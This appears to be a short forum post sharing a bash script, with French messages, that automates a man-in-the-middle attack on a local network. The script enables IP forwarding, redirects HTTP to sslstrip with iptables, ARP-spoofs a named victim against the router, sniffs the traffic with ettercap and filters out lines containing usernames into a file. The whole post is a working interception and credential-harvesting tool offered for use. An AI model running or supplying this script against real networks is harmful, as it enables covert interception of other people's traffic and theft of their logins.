Just a script to automate MITM with sslstrip, it uses ettercap to output sniffed datas, and has a data-to-file comand at the end. It's a bit crap but useful.

Sorry for my English, the script speaks french ...

Code:
#!/bin/bash

# A quick script to automate MITM with sslstrip. You must have an alias for sslstrip.
if [ $# -lt 3 ]
then
	echo "Syntaxe = mitm_ssl.sh -w FILE -c IP_VICTIME -r IP_ROUTEUR -i INTERFACE"
	echo "Si le -w est omis, l'output sera affiché mais pas enregistré."
	echo "Le fichier avec un .out à la fin est trié"
else
	while getopts c:r:i:w: option
	do
		case $option in
			c)
			 IP_VICTIME=$OPTARG
			 echo "IP_VICTIME set to $IP_VICTIME"
			 ;;
			r)
			 IP_ROUTEUR=$OPTARG
			 echo "IP_ROUTEUR set to $IP_ROUTEUR"
			 ;;
		   	i)
			 INTERFACE=$OPTARG
			 echo "IFACE set to $INTERFACE"
			 ;;
			w)
			 WRITE=$OPTARG
			 echo "output file : $OPTARG"
		esac
	done
	echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p TCP --destination-port 80 -j REDIRECT --to-port 10000
	xterm -e "arpspoof -i "$INTERFACE" -t "$IP_VICTIME" "$IP_ROUTEUR"" & 
	echo "ARPspoof lancé."
    sleep 5
	xterm -e "sslstrip -a " &
	echo "de meme pour sslstrip" 
	sleep 5
	ettercap -T -q -i "$INTERFACE" | tee -a "$WRITE"
	cat "$WRITE" | grep -i user |  cut -d " " -f 5-10 > "$WRITE".out
	killall sslstrip
	killall arpspoof
	rm sslstrip.log
fi